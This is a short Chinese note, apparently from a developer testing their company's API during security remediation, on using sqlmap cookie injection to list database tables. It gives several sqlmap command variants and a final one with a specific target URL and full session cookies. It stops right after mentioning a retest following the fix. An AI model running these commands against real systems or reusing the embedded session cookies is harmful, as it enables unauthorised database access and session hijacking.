最近公司系统在做安全方面的整改,有个接口可通过sql注入获取到用户数据库,进而获取到表及表结构信息。故,学习了sqlmap注入中cookie注入相关知识,并做以总结。这是对一个接口做的简单sql注入测试:
经过多次尝试,最终用cookie注入测试:sqlmap.py -u “url地址” –cookie “requests里面的set-cookie信息” --tables --time-sec=2 --level 3 成功获取数据库信息。
最开始尝试用:sqlmap.py -u “url地址” –cookie “requests里面的set-cookie信息” --tables 发现无法注入成功,提示所有的参数都无法注入;
再次用: sqlmap.py -u “url地址” –cookie “requests里面的set-cookie信息” --tables --time-sec=2 及 sqlmap.py -u “url地址” –cookie “requests里面的set-cookie信息” --tables --level 3 也无法注入成功
sqlmap.py -u “url地址” –cookie “requests里面的set-cookie信息” --tables --time-sec=2 --level 3最终用这个命令可以注入成功:
具体:sqlmap.py -u "https://app-ykj-sp.myysq.com.cn/bms/ykj/Organization/user/user-list?_ac=ManagementCenter&_smp=ManagementCenter.Organization&page=1&pageSize=100&organCode=00.&keyword=&organId=835-b9daab6e1f23*&sort_list=%5B%5D&_t=147401" --cookie "gr_user_id=8b4-f1c4-45f5-a601-4ec581543638; cheer_tenant_code=ykj; o=ykj; tenant_code=91e9d6deaf3309309b8fbe5caf0a%3A2%322tenant_code%22%3ta%22%3B%7D; gr_session_id_b95af=18252556-40f5-49c1-a0f2-9c0cefa043e9; gr_session_id_b0fe2556f5-49c1-a0f2-9c0cefa043e9=true; PASSPORTSID2=3ee384e5455a0; PHPSESSID=0b34975544ecd5da1c1d35448d9714; sso=cd5385952958657a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22sso%22%3Bi%3A1%3Bs%3A40%3A%223e40e96b899e384ed9c8b74137441%7D; SERVERID=6a0217cb1d41b9dc338f54e8d3|1586425450|1586425264" --tables --time-sec=2 --level 3
经过开发修复后再次用命令注入: